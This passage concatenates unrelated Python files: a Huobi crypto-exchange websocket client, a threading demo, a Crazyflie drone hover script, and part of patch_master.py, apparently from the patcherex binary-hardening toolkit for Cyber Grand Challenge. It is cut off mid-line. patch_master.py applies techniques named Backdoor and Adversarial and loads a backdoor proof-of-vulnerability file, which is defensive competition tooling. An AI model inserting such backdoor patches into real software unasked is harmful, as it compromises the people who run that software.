ๆŽฅๆ”ถws็š„ๆถˆๆฏๆŽจ้€ๅนถๅค„็†๏ผŒๅŒ…ๆ‹ฌไบ†pingpong๏ผŒๅค„็†่ฎข้˜…ๅˆ—่กจ๏ผŒไปฅๅŠๅค„็†ๆ•ฐๆฎๆŽจ้€ json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') if 'ping' in msg: pong = {'pong': msg['ping']} self.send_message(pong) elif 'status' in msg: if msg['status'] == 'ok': if 'subbed' in msg: self.sub_dict.update({ msg['subbed']: { 'topic': msg['subbed'], 'id': msg['id'] } }) logger.info( f'<่ฎข้˜…>Topic:{msg["subbed"]}่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["id"]}#' ) elif 'unsubbed' in msg: self.sub_dict.pop(msg['unsubbed']) logger.info( f'<่ฎข้˜…>Topic:{msg["unsubbed"]}ๅ–ๆถˆ่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["id"]}#' ) elif 'rep' in msg: logger.info(f'<่ฏทๆฑ‚>Topic:{msg["rep"]}่ฏทๆฑ‚ๆ•ฐๆฎๆˆๅŠŸ #{msg["id"]}#') OnRsp = self._req_callbacks.get(msg['rep'], []) def callbackThread(_m): for cb in OnRsp: try: cb(_m) except Exception as e: logger.error(f'<่ฏทๆฑ‚ๅ›ž่ฐƒ>{msg["rep"]}็š„ๅ›ž่ฐƒๅ‡ฝๆ•ฐ{cb.__name__}ๅผ‚ๅธธ-{e}') task = self._threadPool.submit(callbackThread, msg) elif 'data' in msg: self.pub_msg(msg) # _t = Thread(target=callbackThread, args=(msg, )) # _t.setDaemon(True) # _t.start() elif msg['status'] == 'error': logger.error( f'<้”™่ฏฏ>{msg.get("id")}-ErrTime:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} ErrCode:{msg["err-code"]} ErrMsg:{msg["err-msg"]}' ) else: self.pub_msg(msg) def pub_msg(self, msg): """ๆ ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" if 'ch' in msg: topic = msg.get('ch') self.pub_socket.send_multipart( [pickle.dumps(topic), pickle.dumps(msg)]) for h in self._handle_funcs.get(topic, []): h(msg) @staticmethod def _check_info(**kwargs): log = [] if 'period' in kwargs and kwargs['period'] not in u.PERIOD: log.append(f'<้ชŒ่ฏ>ไธๅญ˜ๅœจPeriod:{kwargs["period"]}') if 'depth' in kwargs and kwargs['depth'] not in u.DerivativesDEPTH: log.append(f'<้ชŒ่ฏ>ไธๅญ˜ๅœจDepth:{kwargs["depth"]}') if log: for l in log: logger.warning(l) return False else: return True def sub_kline(self, symbol, period, _id=''): if self._check_info(symbol=symbol, period=period): msg = {'sub': f'market.{symbol}.kline.{period}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>kline-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['sub'], _id def unsub_kline(self, symbol, period, _id=''): if self._check_info(symbol=symbol, period=period): msg = {'unsub': f'market.{symbol}.kline.{period}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>kline-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['unsub'], _id def sub_depth(self, symbol, depth=0, _id=''): if self._check_info(symbol=symbol, depth=depth): msg = {'sub': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>depth-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['sub'], _id def unsub_depth(self, symbol, depth=0, _id=''): if self._check_info(symbol=symbol, depth=depth): msg = { 'unsub': f'market.{symbol}.depth.{u.DEPTH[depth]}', 'id': _id } self.send_message(msg) logger.info( f'<่ฎข้˜…>depth-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}*@{u.DEPTH[depth]} #{_id}#') return msg['unsub'], _id def sub_last_24h_kline(self, symbol, _id=''): msg = {'sub': f'market.{symbol}.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>Last_24h_kline-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['sub'], _id def unsub_last_24h_kline(self, symbol, _id=''): msg = { 'unsub': f'market.{symbol}.detail', 'id': _id } self.send_message(msg) logger.info( f'<่ฎข้˜…>Last_24h_kline-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['unsub'], _id def sub_tick(self, symbol, _id=''): if self._check_info(symbol=symbol): msg = {'sub': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>tick-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['sub'], _id def unsub_tick(self, symbol, _id=''): if self._check_info(symbol=symbol): msg = {'unsub': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฎข้˜…>tick-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['unsub'], _id # ------------------------------------------------------------------------- # -------------------------่กŒๆƒ…่ฏทๆฑ‚ๅ‡ฝๆ•ฐ---------------------------------------- def req_kline(self, symbol, period, _id='', **kwargs): if self._check_info(symbol=symbol, period=period): msg = {'req': f'market.{symbol}.kline.{period}', 'id': _id} if '_from' in kwargs: _from = parser.parse(kwargs['_from']).timestamp() if isinstance( kwargs['_from'], str) else kwargs['_from'] msg.update({'from': int(_from)}) if '_to' in kwargs: _to = parser.parse(kwargs['_to']).timestamp() if isinstance( kwargs['_to'], str) else kwargs['_to'] msg.update({'to': int(_to)}) self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>kline-ๅ‘้€่ฏทๆฑ‚*{symbol}*@{period} #{_id}#') return msg['req'], _id def req_tick(self, symbol, _id=''): msg = {'req': f'market.{symbol}.trade.detail', 'id': _id} self.send_message(msg) logger.info(f'<่ฏทๆฑ‚>tick-ๅ‘้€่ฏทๆฑ‚*{symbol}* #{_id}#') return msg['req'], _id # ------------------------------------------------------------------------- def after_open(self,_func): # wsๅผ€ๅฏไน‹ๅŽ้œ€่ฆๅฎŒๆˆ็š„ๅˆๅง‹ๅŒ–ๅค„็† @wraps(_func) def _callback(): try: _func() except Exception as e: logger.exception(f'afer_openๅ›ž่ฐƒๅค„็†้”™่ฏฏ{e}') self._open_callbacks.append(_callback) return _callback class _DerivativesAuthWS(BaseWebsocket): def __init__(self, host='api.hbdm.com', reconn=10, interval=3): self._protocol = 'wss://' self._host = host self._path = '/notification' self.addr = self._protocol + self._host + self._path self._threadPool = ThreadPoolExecutor(max_workers=3) self.name = f'HuoBiDerivativesAuthWS_{uuid.uuid1()}' self.sub_dict = {} # ่ฎข้˜…ๅˆ—่กจ self._handlers = [] # ๅฏนmessageๅšๅค„็†็š„ๅค„็†ๅ‡ฝๆ•ฐๆˆ–ๅค„็†็ฑป self._req_callbacks = {} self._handle_funcs = {} self._auth_callbacks = [] self.ctx = zmq_ctx self.pub_socket = self.ctx.socket(zmq.PUB) self.pub_socket.bind(f'inproc://{self.name}') self._active = False self._reconn = reconn self._interval = interval def on_open(self): self._active = True logger.info(f'<่ฟžๆŽฅ>ๅปบ็ซ‹ไธŽ{self.addr}็š„่ฟžๆŽฅ') self.auth() logger.info(f'<้‰ดๆƒ>ๅ‘{self.addr}ๅ‘่ตท้‰ดๆƒ่ฏทๆฑ‚') def on_message(self, _msg): # ้‰ดๆƒws็š„ๆถˆๆฏๅค„็† json_data = gz.decompress(_msg).decode() msg = json.loads(json_data) logger.debug(f'{msg}') op = msg['op'] if op == 'ping': pong = {'op': 'pong', 'ts': msg['ts']} self.send_message(pong) if msg.setdefault('err-code', 0) == 0: if op == 'notify': self.pub_msg(msg) elif op == 'sub': logger.info( f'<่ฎข้˜…>Topic:{msg["topic"]}่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') elif op == 'unsub': logger.info( f'<่ฎข้˜…>Topic:{msg["topic"]}ๅ–ๆถˆ่ฎข้˜…ๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') elif op == 'req': logger.info(f'<่ฏทๆฑ‚>Topic:{msg["topic"]}่ฏทๆฑ‚ๆ•ฐๆฎๆˆๅŠŸ #{msg["cid"]}#') OnRsp = self._req_callbacks.get(msg['topic'], []) def callbackThread(_m): for cb in OnRsp: try: cb(_m) except Exception as e: logger.error(f'<่ฏทๆฑ‚ๅ›ž่ฐƒ>{msg["topic"]}็š„ๅ›ž่ฐƒๅ‡ฝๆ•ฐ{cb.__name__}ๅผ‚ๅธธ-{e}') task = self._threadPool.submit(callbackThread, msg) # _t = Thread(target=callbackThread, args=(msg,)) # _t.setDaemon(True) # _t.start() elif op == 'auth': logger.info( f'<้‰ดๆƒ>้‰ดๆƒๆˆๅŠŸ Time:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} #{msg["cid"]}#') for cb in self._auth_callbacks: cb() else: logger.error( f'<้”™่ฏฏ>{msg.get("cid")}-OP:{op} ErrTime:{dt.datetime.fromtimestamp(msg["ts"] / 1000)} ErrCode:{msg["err-code"]} ErrMsg:{msg["err-msg"]}' ) def pub_msg(self, msg): """ๆ ธๅฟƒ็š„ๅค„็†ๅ‡ฝๆ•ฐ๏ผŒๅฆ‚ๆžœๆ˜ฏhandle_func็›ดๆŽฅๅค„็†๏ผŒๅฆ‚ๆžœๆ˜ฏhandler๏ผŒๆŽจ้€ๅˆฐhandler็š„้˜Ÿๅˆ—""" topic = msg.get('topic') self.pub_socket.send_multipart( [pickle.dumps(topic), pickle.dumps(msg)]) for h in self._handle_funcs.get(topic, []): h(msg) def auth(self, cid:str =''): from .utils import ACCESS_KEY, SECRET_KEY, createSign timestamp = dt.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%S') params = { "AccessKeyId": ACCESS_KEY, "SignatureMethod": "HmacSHA256", "SignatureVersion": "2", "Timestamp": timestamp,} signature = createSign(params, 'GET', self._host, self._path, SECRET_KEY) params['Signature'] = signature params['op'] = 'auth' params['cid'] = cid params['type'] = 'api' self.send_message(params) return 'auth', cid # def sub_accounts(self, cid:str=''): # msg = {'op': 'sub', 'cid': cid, 'topic': 'accounts'} # self.send_message(msg) # logger.info(f'<่ฎข้˜…>accouts-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid # # def unsub_accounts(self, cid:str=''): # msg = {'op': 'unsub', 'cid': cid, 'topic': 'accounts'} # self.send_message(msg) # logger.info(f'<่ฎข้˜…>accouts-ๅ‘้€่ฎข้˜…ๅ–ๆถˆ่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid def sub_orders(self, symbol='*', cid:str=''): """ :param symbol: '*'ไธบ่ฎข้˜…ๆ‰€ๆœ‰่ฎขๅ•ๅ˜ๅŒ– :param cid: :return: """ msg = {'op': 'sub', 'cid': cid, 'topic': f'orders.{symbol}'} self.send_message(msg) logger.info(f'<่ฎข้˜…>orders-ๅ‘้€่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{cid}#') return msg['topic'], cid def unsub_orders(self, symbol='*', cid:str=''): """ :param symbol: '*'ไธบ่ฎข้˜…ๆ‰€ๆœ‰่ฎขๅ•ๅ˜ๅŒ– :param cid: :return: """ msg = {'op': 'unsub', 'cid': cid, 'topic': f'orders.{symbol}'} self.send_message(msg) logger.info(f'<่ฎข้˜…>orders-ๅ‘้€ๅ–ๆถˆ่ฎข้˜…่ฏทๆฑ‚*{symbol}* #{cid}#') return msg['topic'], cid # # ------------------------------------------------------------------------ # # ----------------------ๅธๆˆท่ฏทๆฑ‚ๅ‡ฝๆ•ฐ-------------------------------------- # def req_accounts(self, cid:str=''): # msg = {'op': 'req', 'cid': cid, 'topic': 'accounts.list'} # self.send_message(msg) # logger.info(f'<่ฏทๆฑ‚>accounts-ๅ‘้€่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid # # def req_orders(self, acc_id, symbol, states:list, # types:list=None, # start_date=None, end_date=None, # _from=None, direct=None, # size=None, cid:str=''): # states = ','.join(states) # msg = {'op': 'req', 'account-id': acc_id, 'symbol': symbol, 'states': states, 'cid': cid, # 'topic': 'orders.list'} # if types: # types = ','.join(types) # msg['types'] = types # # if start_date: # start_date = parser.parse(start_date).strftime('%Y-%m-%d') # msg['start-date'] = start_date # # if end_date: # end_date = parser.parse(end_date).strftime('%Y-%m-%d') # msg['end-date'] = end_date # # if _from: # msg['_from'] = _from # # if direct: # msg['direct'] = direct # # if size: # msg['size'] = size # # self.send_message(msg) # logger.info(f'<่ฏทๆฑ‚>orders-ๅ‘้€่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid # # def req_orders_detail(self, order_id, cid:str=''): # msg = {'op': 'req', 'order-id': order_id, 'cid': cid, 'topic': 'orders.detail'} # self.send_message(msg) # logger.info(f'<่ฏทๆฑ‚>accounts-ๅ‘้€่ฏทๆฑ‚ #{cid}#') # return msg['topic'], cid def after_auth(self,_func): # wsๅผ€ๅฏไน‹ๅŽ้œ€่ฆๅฎŒๆˆ็š„ๅˆๅง‹ๅŒ–ๅค„็† @wraps(_func) def _callback(): try: _func() except Exception as e: logger.exception(f'afer_openๅ›ž่ฐƒๅค„็†้”™่ฏฏ{e}') self._auth_callbacks.append(_callback) return _callback
enumerate-thread.py
from time import sleep, perf_counter from threading import Thread, enumerate start = perf_counter() def show(name): print(f'Starting {name} ...') print(enumerate()) sleep(3) print(f'Finishing {name} ...') t1 = Thread(target=show, args=('One',), name='First') t2 = Thread(target=show, args=('Two',), name='Second') t1.start() t2.start() t1.join() t2.join() end = perf_counter() print(round(end - start))
hover.py
# When I wrote this, only God and I understood what I was doing # Now, God only knows import time, sys from threading import Thread #FIXME: Has to be launched from within the example folder sys.path.append("/home/jonathan/Programs/crazyflie/cfclient-2014.01.0/lib") import cflib from cflib.crazyflie import Crazyflie from controller import SampleListener import logging logging.basicConfig(level=logging.ERROR) class Hover: def __init__(self, link_uri, control_listener, config=None): """ Initialize and run the example with the specified link_uri """ self._config = config self._cf = Crazyflie() self._control_listener = control_listener self._cf.connected.add_callback(self._connected) self._cf.disconnected.add_callback(self._disconnected) self._cf.connection_failed.add_callback(self._connection_failed) self._cf.connection_lost.add_callback(self._connection_lost) self._cf.open_link(link_uri) print "Connecting to %s" % link_uri def _connected(self, link_uri): print "Connected to %s" % link_uri Thread(target=self._hover_this_shit).start() # self._hover_this_shit() def _disconnected(self, link_uri): print "disconnected from %s" % link_uri def _connection_failed(self, link_uri, msg): print "Connection to %s failed: %s" % (link_uri, msg) if not self._config: if "reconnect" in self._config: print "Attempting reconnect.." if self._config["reconnect"]: self._cf.open_link(link_uri) else: sys.exit(2) def _connection_lost(self, link_uri, msg): print "Connection to %s lost: %s" % (link_uri, msg) if "reconnect" in self._config: print "Attempting reconnect.." if self._config["reconnect"]: self._cf.open_link(link_uri) else: sys.exit(3) # def _hover_this_shit(self): # print "Hovering this shit" # thrust_mult = 1.5 # thrust_step = 500 # thrust = 20000 # pitch = -6 # roll = -2 # yawrate = 0 # while thrust >= 20000: # self._cf.commander.send_setpoint(roll, pitch, yawrate, thrust) # time.sleep(0.1) # if thrust >=47000: # thrust_mult = -1 # thrust += thrust_step * thrust_mult # self._cf.commander.send_setpoint(0, 0, 0, 0) # # Make sure that the last packet leaves before the link is closed # # since the message queue is not flushed before closing # time.sleep(0.1) # self._cf.close_link() def _hover_this_shit(self): print "Hovering this shit" # try: while True: print "asdasd %s %s %s %d" % ( int(self._control_listener.roll()*10), int(self._control_listener.pitch()*10), int(self._control_listener.yaw()*100), int(self._control_listener.y() * 47000)) self._cf.commander.send_setpoint( int(self._control_listener.roll()*10), int(self._control_listener.pitch()*10), int(self._control_listener.yaw()*100), int(self._control_listener.y() * 47000)) # self._cf.commander.send_setpoint( # 0, # 0, # 0, # int(self._control_listener.y() * 47000)) time.sleep(0.1) # except (KeyboardInterrupt): # self._cf.commander.send_setpoint(0, 0, 0, 0) # self._cf.close_link() # exit
patch_master.py
#!/usr/bin/env python import sys import os import logging import resource import traceback import timeout_decorator import itertools import psutil import multiprocessing import subprocess import random import concurrent.futures import datetime import tempfile import termcolor import traceback import time import cPickle as pickle from ctypes import cdll from cStringIO import StringIO from collections import OrderedDict from patcherex.techniques.qemudetection import QemuDetection from patcherex.techniques.shadowstack import ShadowStack from patcherex.techniques.packer import Packer from patcherex.techniques.simplecfi import SimpleCFI from patcherex.techniques.cpuid import CpuId from patcherex.techniques.randomsyscallloop import RandomSyscallLoop from patcherex.techniques.stackretencryption import StackRetEncryption from patcherex.techniques.indirectcfi import IndirectCFI from patcherex.techniques.transmitprotection import TransmitProtection from patcherex.techniques.shiftstack import ShiftStack from patcherex.techniques.nxstack import NxStack from patcherex.techniques.adversarial import Adversarial from patcherex.techniques.backdoor import Backdoor from patcherex.techniques.bitflip import Bitflip from patcherex.techniques.binary_optimization import optimize_it from patcherex.techniques.uninitialized_patcher import UninitializedPatcher from patcherex.techniques.malloc_ext_patcher import MallocExtPatcher from patcherex.techniques.noflagprintf import NoFlagPrintfPatcher from patcherex.techniques.fidgetpatches import fidget_it from patcherex.errors import * from patcherex.backends.detourbackend import DetourBackend from patcherex.backends.reassembler_backend import ReassemblerBackend from patcherex.patches import * from networkrules import NetworkRules l = logging.getLogger("patcherex.PatchMaster") def get_backdoorpov(): self_location_folder = os.path.dirname(os.path.realpath(__file__)) backdoorpov_fname = os.path.join(self_location_folder,"../backdoor_stuff/backdoor_pov.pov") with open(backdoorpov_fname) as fp: content = fp.read() return content def test_bin_with_qemu(original,patched_blob,bitflip=False): import shellphish_qemu import subprocess32 def try_bin_with_input(path,tinput,seed=123): pipe = subprocess32.PIPE qemu_location = shellphish_qemu.qemu_path('cgc-nxtracer') main_args = [qemu_location,"-seed",str(seed)] if bitflip: used_args = main_args + ["-bitflip"] else: used_args = main_args final_args = used_args + [os.path.realpath(path)] print " ".join(final_args) p = subprocess32.Popen(final_args, stdin=pipe, stdout=pipe, stderr=pipe, preexec_fn=process_killer) status = "ok" try: try: stdout,stderr = p.communicate(tinput,timeout=10) print stdout print stderr print p.returncode except OSError: print "OSError" # I have seen: "OSError: [Errno 32] Broken pipe" # likely because the process dies before it reads all the input # I just "pass", the code later on will check if it is a crash or normal exit if p.returncode == None: # returncode == None means the process is still running # this means the process did not terminate # I am not even sure this is possible, but I am going to terminate it to be sure p.terminate() p.wait() # either communicate has finished or I called terminate, so wait will not stall # 46 is the special error code value used in cgc-nxtracer used to indicate # execution attempt of not executable memory if p.returncode < 0 or p.returncode == 46: status = "crash" except subprocess32.TimeoutExpired: print "Timeout" status = "halt" p.terminate() p.wait() print status return status patched = tempfile.mktemp() with open(patched,'wb') as fp: fp.write(patched_blob) os.chmod(patched, 0755) # given challenge_binary_node.py the original file is executable # check file size, if it more than 200% (equivalent to 125% speed/memory overhead) we do not even try to submit # this should really never happen even when we do not remove the pdf, # the biggest increase of file size I have seen was 121% osize = os.path.getsize(original) psize = os.path.getsize(patched) size_overhead = (psize/float(osize))*100.0 print "size_overhead", size_overhead if size_overhead > 200.0: raise SizeError(str(psize) + " vs " + str(osize)) inputs = ["","B","\n","\x00","1\n \x00"*10,"\xff\x80"+"".join([chr(i) for i in xrange(2,200,6)])] success_tests = [] for i,tinput in enumerate(inputs): tseed = 1000+i test_result = try_bin_with_input(original,tinput,tseed) if test_result == "ok": success_tests.append((tinput,tseed)) for success_input,tseed in success_tests: test_result = try_bin_with_input(patched,success_input,tseed) if test_result != "ok": os.unlink(patched) raise FunctionalityError("input ->"+success_input.encode('hex')+"<-") os.unlink(patched) class PatchMaster(): def __init__(self,infile): self.infile = infile def generate_stackretencryption_binary(self, test_bin=None): backend = ReassemblerBackend(self.infile) patches = [] patches.extend(StackRetEncryption(self.infile, backend).get_patches()) backend.apply_patches(patches) final_content = backend.get_final_content() return (final_content, "") def generate_fidget_bitflip_binary(self): nr = NetworkRules() midfile = self.infile + '.fidget' + str(random.randrange(0,1000)) fidget_it(self.infile, midfile) backend = DetourBackend(midfile) cp = Bitflip(midfile,backend) patches1 = cp.get_patches() backend.apply_patches(patches1) return (backend.get_final_content(),nr.get_bitflip_rule()) ################## def generate_medium_reassembler_optimized_binary(self,test_bin=True): try: intermediate = tempfile.mktemp(prefix='%s_' % os.path.basename(self.infile)) optimize_it(self.infile, intermediate) nr = NetworkRules() backend = ReassemblerBackend(intermediate) patches = [] patches.extend(IndirectCFI(intermediate,backend).get_patches()) patches.extend(TransmitProtection(intermediate,backend).get_patches()) patches.extend(ShiftStack(intermediate,backend).get_patches()) patches.extend(Adversarial(intermediate,backend).get_patches()) patches.extend(Backdoor(intermediate,backend).get_patches()) # patches.extend(NxStack(intermediate,backend).get_patches()) patches.extend(MallocExtPatcher(intermediate,backend).get_patches()) patches.extend(StackRetEncryption(intermediate,backend).get_patches()) patches.extend(UninitializedPatcher(intermediate,backend).get_patches()) patches.extend(NoFlagPrintfPatcher(intermediate, backend).get_patches()) backend.apply_patches(patches) final_content = backend.get_final_content() if test_bin: test_bin_with_qemu(self.infile,final_content) res = (final_content,"") except PatcherexError, e: traceback.print_exc(e) res = (None,None) return res def generate_medium_reassembler_binary(self,test_bin=True): try: nr = NetworkRules() backend = ReassemblerBackend(self.infile) patches = [] patches.extend(IndirectCFI(self.infile,backend).get_patches()) patches.extend(TransmitProtection(self.infile,backend).get_patches()) patches.extend(ShiftStack(self.infile,backend).get_patches()) patches.extend(Adversarial(self.infile,backend).get_patches()) patches.extend(Backdoor(self.infile,backend).get_patches()) # patches.extend(NxStack(self.infile,backend).get_patches()) patches.extend(MallocExtPatcher(self.infile,backend).get_patches()) patches.extend(StackRetEncryption(self.infile,backend).get_patches()) patches.extend(UninitializedPatcher(self.infile,backend).get_patches()) patches.extend(NoFlagPrintfPatcher(self.infile, backend).get_patches()) backend.apply_patches(patches) final_content = backend.get_final_content() if test_bin: test_bin_with_qemu(self.infile,final_content) res = (final_content,"") except PatcherexError, e: traceback.print_exc(e) res = (None,None) return res def generate_medium_detour_binary(self,test_bin=True): try: nr = NetworkRules() backend = DetourBackend(self.infile) patches = [] patches.extend(IndirectCFI(self.infile,backend).get_patches()) patches.extend(TransmitProtection(self.infile,backend).get_patches()) patches.extend(ShiftStack(self.infile,backend).get_patches()) patches.extend(Adversarial(self.infile,backend).get_patches()) patches.extend(Backdoor(self.infile,backend).get_patches()) # patches.extend(NxStack(self.infile,backend).get_patches()) patches.extend(MallocExtPatcher(self.infile,backend).get_patches()) patches.extend(StackRetEncryption(self.infile,backend).get_patches()) patches.extend(UninitializedPatcher(self.infile,backend).get_patches()) patches.extend(NoFlagPrintfPatcher(self.infile, backend).get_patches()) backend.apply_patches(patches) final_content = backend.get_final_content() if test_bin: test_bin_with_qemu(self.infile,final_content) res = (final_content,"") except PatcherexError, e: traceback.print_exc(e) res = (None,None) return res ######################## def create_one_patch(self,patch_type): m = getattr(self,"generate_"+patch_type+"_binary") patch, network_rule = m(test_bin=True) return patch, network_rule def process_killer(): cdll['libc.so.6'].prctl(1,9) def shellquote(s): return "'" + s.replace("'", "'\\''") + "'" def exec_cmd(args,cwd=None,shell=False,debug=False,pkill=True): #debug = True if debug: print "EXECUTING:",repr(args),cwd,shell pipe = subprocess.PIPE preexec_fn = None if pkill: preexec_fn = process_killer p = subprocess.Popen(args,cwd=cwd,shell=shell,stdout=pipe,stderr=pipe,preexec_fn=process_killer) std = p.communicate() retcode = p.poll() res = (std[0],std[1],retcode) if debug: print "RESULT:",repr(res) return res def worker(inq,outq,filename_with_technique=True,timeout=60*3,test_results=True): def delete_if_exists(fname): try: os.unlink(fname) except OSError: pass process_killer() while True: input_file,technique,output_dir = inq.get() if filename_with_technique: output_fname = os.path.join(output_dir,os.path.basename(input_file)+"_"+technique) else: output_fname = os.path.join(output_dir,os.path.basename(input_file)) delete_if_exists(output_fname) delete_if_exists(output_fname+"_log") args = ["timeout","-s","9",str(timeout),os.path.realpath(__file__),"single",input_file,technique,output_fname] if test_results: args += ["--test"] res = exec_cmd(args) with open(output_fname+"_log","wb") as fp: fp.write("\n"+"="*30+" STDOUT\n") fp.write(res[0]) fp.write("\n"+"="*30+" STDERR\n") fp.write(res[1]) fp.write("\n"+"="*30+" RETCODE: ") fp.write(str(res[2]).strip()) fp.write("\n") if(res[2]!=0 or not os.path.exists(output_fname)): outq.put((False,(input_file,technique,output_dir),res)) else: outq.put((True,(input_file,technique,output_dir),res)) def ftodir(f,out): dname = os.path.split(os.path.split(f)[-2])[-1] res = os.path.join(out,dname) #print "-->",out,dname,res return res def ftodir2(f,technique,out): sep = os.path.sep cb_name, flavour = f.split(sep)[-3:-1] res = os.path.join(*[out,flavour,technique,cb_name]) return res if __name__ == "__main__": if sys.argv[1] == "run": logging.getLogger("patcherex.backends.DetourBackend").setLevel("INFO") logging.getLogger("patcherex.backend").setLevel("INFO") logging.getLogger("patcherex.techniques.NoFlagPrintfPatcher").setLevel("DEBUG") logging.getLogger("patcherex.techniques.StackRetEncryption").setLevel("DEBUG") logging.getLogger("patcherex.techniques.IndirectCFI").setLevel("DEBUG") logging.getLogger("patcherex.techniques.TransmitProtection").setLevel("DEBUG") logging.getLogger("patcherex.techniques.ShiftStack").setLevel("DEBUG") logging.getLogger("patcherex.techniques.NxStack").setLevel("DEBUG") logging.getLogger("patcherex.techniques.Adversarial").setLevel("DEBUG") logging.getLogger("patcherex.techniques.Backdoor").setLevel("DEBUG") logging.getLogger("patcherex.PatchMaster").setLevel("INFO") input_fname = sys.argv[2] out = os.path.join(sys.argv[3],os.path.basename(input_fname)) pm = PatchMaster(input_fname) res = pm.run(return_dict = True) with open(sys.argv[2]) as fp: original_content = fp.read() res["original"] = (original_content, '') for k,(v,rule) in res.iteritems(): output_fname = out+"_"+k fp = open(output_fname,"wb") fp.write(v) fp.close() os.chmod(output_fname, 0755) with open(output_fname+'.rules','wb') as rf: rf.write(rule) elif sys.argv[1] == "single": cdll['libc.so.6'].prctl(1,9) mem_limit = 16 * pow(2, 30) resource.setrlimit(resource.RLIMIT_AS, (mem_limit, mem_limit)) print "="*50,"process started at",str(datetime.datetime.now()) start_time = time.time() print " ".join(map(shellquote,sys.argv)) logging.getLogger("patcherex.backends.DetourBackend").setLevel("INFO") logging.getLogger("patcherex.backend").setLevel("INFO") logging.getLogger("patcherex.techniques.NoFlagPrintfPatcher").setLevel("DEBUG") logging.getLogger("patcherex.techniques.StackRetEncryption").setLevel("DEBUG") logging.getLogger("patcherex.techniques.IndirectCFI").setLevel("DEBUG") logging.getLogger("patcherex.techniques.TransmitProtection").setLevel("DEBUG") logging.getLogger("patcherex.techniques.ShiftStack").setLevel("DEBUG") logging.getLogger("patcherex.techniques.NxStack").setLevel("DEBUG") logging.getLogger("patcherex.techniques.Adversarial").setLevel("DEBUG") logging.getLogger("patcherex.techniques.Backdoor").setLevel("DEBUG") logging.getLogger("patcherex.PatchMaster").setLevel("INFO") input_fname = sys.argv[2] technique = sys.argv[3] output_fname = sys.argv[4] pm = PatchMaster(input_fname) m = getattr(pm,"generate_"+technique+"_binary") if "--test" in sys.argv: res = m(test_bin = True) else: res = m(test_bin = False) # handle generate_ methods returning also a network rule bitflip = False if res[0] == None: sys.exit(33) if not any([output_fname.endswith("_"+str(i)) for i in xrange(2,10)]): fp = open(os.path.join(os.path.dirname(output_fname),"ids.rules"),"wb") fp.write(res[1]) fp.close() if "bitflip" in res[1]: bitflip = True patched_bin_content = res[0] fp = open(output_fname,"wb") fp.write(patched_bin_content) fp.close() os.chmod(output_fname, 0755) print "="*50,"process ended at",str(datetime.datetime.now()),"in",str(time.time()-start_time) elif sys.argv[1] == "multi" or sys.argv[1] == "multi_name" or sys.argv[1] == "multi_name2": out = sys.argv[2] techniques = sys.argv[3].split(",") if "--test" == sys.argv[7]: test_results = True else: test_results = False files = sys.argv[8:] technique_in_filename = True if sys.argv[1] == "multi_name": tasks = [] for f in files: for t in techniques: outdir = ftodir(f,out) try: os.makedirs(outdir) except OSError: pass tasks.append((f,t,outdir)) elif sys.argv[1] == "multi_name2": tasks = [] technique_in_filename = False for f in files: for t in techniques: outdir = ftodir2(f,t,out) try: os.makedirs(outdir) except OSError: pass try: os.mkdir(outdir) except OSError: pass tasks.append((f,t,outdir)) elif sys.argv[1] == "multi": tasks = [(f,t,out) for f,t in list(itertools.product(files,techniques))] print len(tasks) res_dict = {} inq = multiprocessing.Queue() outq = multiprocessing.Queue() plist = [] nprocesses = int(sys.argv[5]) if nprocesses == 0: nprocesses = int(psutil.cpu_count()*1.0) timeout = int(sys.argv[6]) for i in xrange(nprocesses): p = multiprocessing.Process(target=worker, args=(inq,outq,technique_in_filename,timeout,test_results)) p.start() plist.append(p) ntasks = len(tasks) random.shuffle(tasks,lambda : 0.1) for t in tasks: inq.put(t) for i in xrange(ntasks): res = outq.get() sep = os.path.sep key = (sep.join(res[1][0].split(sep)[-3:]),res[1][1]) status = res[0] value = res[2] if status: status = termcolor.colored(status,"green") else: status = termcolor.colored(status,"red") print "=" * 20, str(i+1)+"/"+str(ntasks), key, status #print value res_dict[key] = res for p in plist: p.terminate() failed_patches = {k:v for k,v 